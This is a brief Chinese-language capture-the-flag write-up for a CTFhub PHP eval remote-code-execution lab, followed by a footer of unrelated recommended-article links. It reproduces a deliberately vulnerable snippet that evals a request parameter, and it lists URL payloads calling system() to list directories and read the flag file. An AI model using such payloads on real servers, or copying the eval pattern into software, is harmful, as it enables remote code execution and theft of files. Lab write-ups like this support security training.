CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
qq_492448446几秒前
Jmeter Transaction Controller(事务控制器) 的 TPS(每秒事务数)严格固定为 1
java·开发语言·jmeter
jsl_jsl_jsl4 分钟前
Java 后端基石:JVM 运行机制、内存管理与传参陷阱
java
懂懂tty7 分钟前
Vue3 手写响应式原理
前端·vue.js
玄泽幻库7 分钟前
【主流版本】JDK安装版下载地址和环境配置方法
java·开发语言·jdk
鹏程十八少8 分钟前
Android 无障碍服务失效,一次AccessibilityService“离奇死亡”的完整破案实录
前端·后端·面试
西凉的悲伤9 分钟前
Java parallelStream并行流
java·开发语言·parallelstream·并行流
weixin_5118753315 分钟前
【无标题】
前端
两年半的个人练习生^_^16 分钟前
JVM 内存结构详解
java·jvm
@杰克成17 分钟前
Java学习28
java·python·学习
随风丶飘18 分钟前
DeepSeek TUI 让后端告别窗口切来切去
java·ai编程